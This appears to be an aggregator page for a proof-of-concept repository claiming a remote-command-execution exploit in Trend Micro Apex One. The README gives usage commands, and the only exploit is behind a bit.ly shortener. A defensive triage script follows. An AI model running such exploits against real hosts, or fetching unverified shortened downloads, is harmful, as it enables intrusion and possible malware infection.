Related vulnerabilities
Introduction
# CVE-2025-54948 PoC Exploit - Trend Micro Apex One Management Console RCE
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54948, a remote code execution vulnerability in the Trend Micro Apex One Management Console (on-premise). The vulnerability allows pre-authenticated attackers to execute arbitrary commands due to insufficient input validation.
**WARNING**: This PoC is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The author is not responsible for any misuse.
## Vulnerability Details
- **CVE ID**: CVE-2025-54948
- **CVSSv3 Score**: 9.4 (Critical)
- **Affected Software**: Trend Micro Apex One (on-premise), Management Server ≤ 14039
- **Platform**: Windows
- **Description**: A command injection vulnerability in the management console allows pre-authenticated attackers to upload and execute malicious code.
## Exploit
The exploit itself is not in this repository; it is only linked through a shortened URL: http://bit.ly/3HpN6dp. The snapshot of the repository (see the file snapshot below) contains README.md alone, so the `exploit.py` and `requirements.txt` referenced in the Usage section are not present. Resolve the shortened link without following it (for example a HEAD request that does not follow redirects) and inspect the destination before downloading or running anything from it.
## Usage
1. **Install Dependencies**:
```bash
pip install -r requirements.txt
```
2. **Run the Exploit**:
```bash
python exploit.py <target_url> [--command <command>]
```
Example:
```bash
python exploit.py "http://192.168.1.100:8080" --command "whoami"
```
3. **Verify Output**: Check the console logs for execution status and response details.
## Requirements
- Python 3.6+
- Libraries listed in `requirements.txt`
## Disclaimer
This PoC is provided "as is" for security researchers and system administrators to understand the vulnerability. Use it only with explicit permission from the system owner. Misuse may violate laws and cause harm.
## Mitigation
A full patch is expected by mid-August 2025. Until it is available, the Trend Micro bulletin provides a temporary fix tool; note that applying it disables the Remote Install Agent function of the management console, which is the feature the affected code path belongs to. See [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926).
## References
- [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926)
- [Qualys ThreatPROTECT Blog](https://threatprotect.qualys.com/2025/08/06/trend-micro-apex-one-on-prem-zero-day-vulnerabilities-exploited-in-the-wild-cve-2025-54948-cve-2025-54987/)
File snapshot
[4.0K] /data/pocs/6df3d7e0004136919c03ed1efd812906008de3ac
└── [2.1K] README.md
0 directories, 1 file
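A triage step worth running before following the Usage section above, as an added example that is not part of this repository or the page: the script parses the README, collects the local files that its fenced commands invoke, reports which of them are absent from the checked-out snapshot, and flags links that go through a URL shortener. The shortener host list and the sample README text (built from the sections on this page) are constructed for the example; point `triage()` at a real checkout to use it.

```python
"""Triage a PoC repository before running anything from it.

Added example, not code from the original README or repository. The sample
README and directory layout are constructed to mirror this page: a README
that tells you to run exploit.py and requirements.txt, a snapshot that only
contains README.md, and an exploit link that goes through bit.ly.
"""
import re
import sys
import tempfile
from pathlib import Path

# Hosts that hide the real destination of a link; an assumed list for this example.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "cutt.ly", "is.gd"}

FENCE = "`" * 3  # markdown code fence, built by concatenation so it stays regex-safe
FENCE_RE = re.compile(FENCE + r"(?:\w+)?\n(.*?)" + FENCE, re.DOTALL)
LINK_RE = re.compile(r"https?://([^/\s)\"']+)[^\s)\"']*")
# Tokens that look like a local file a command would execute or read.
LOCAL_FILE_RE = re.compile(r"(?<![\w/.-])([\w.-]+\.(?:py|txt|sh|ps1|exe|dll|zip))\b")

# Constructed sample README, reduced to the parts that matter for triage.
SAMPLE_README = "\n".join([
    "# CVE-2025-54948 PoC Exploit",
    "## Exploit - [href](http://bit.ly/3HpN6dp)",
    "## Usage",
    "1. **Install Dependencies**:",
    FENCE + "bash",
    "pip install -r requirements.txt",
    FENCE,
    "2. **Run the Exploit**:",
    FENCE + "bash",
    "python exploit.py <target_url> [--command <command>]",
    FENCE,
    "## References",
    "- [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926)",
]) + "\n"


def referenced_files(readme_text):
    """Local file names mentioned inside the README's fenced command blocks."""
    names = set()
    for block in FENCE_RE.findall(readme_text):
        for line in block.splitlines():
            names.update(LOCAL_FILE_RE.findall(line))
    return names


def shortened_links(readme_text):
    """Every URL in the README whose host is a known shortener."""
    return sorted(
        m.group(0) for m in LINK_RE.finditer(readme_text)
        if m.group(1).lower() in SHORTENER_HOSTS
    )


def missing_files(repo_root, readme_text):
    """Files the README tells you to run that are not in the snapshot."""
    root = Path(repo_root)
    return sorted(n for n in referenced_files(readme_text) if not (root / n).exists())


def triage(repo_root):
    """Read README.md under repo_root and return the two findings."""
    readme = (Path(repo_root) / "README.md").read_text(encoding="utf-8")
    return {"missing": missing_files(repo_root, readme),
            "shortened": shortened_links(readme)}


def build_sample_snapshot(with_exploit_files=False):
    """Create a temp checkout: README.md only, or README.md plus placeholder files."""
    root = Path(tempfile.mkdtemp(prefix="poc-triage-"))
    (root / "README.md").write_text(SAMPLE_README, encoding="utf-8")
    if with_exploit_files:
        (root / "exploit.py").write_text("# placeholder\n", encoding="utf-8")
        (root / "requirements.txt").write_text("requests\n", encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_snapshot()
    print(triage(target))
```

Run it against a real checkout with `python triage.py /path/to/repo`; an exploit that is only reachable through a shortener, or that the README describes but the tree does not contain, is a reason to stop and inspect the destination manually before anything is executed.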
Notes
1. Accessing the PoC through the original source is recommended.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.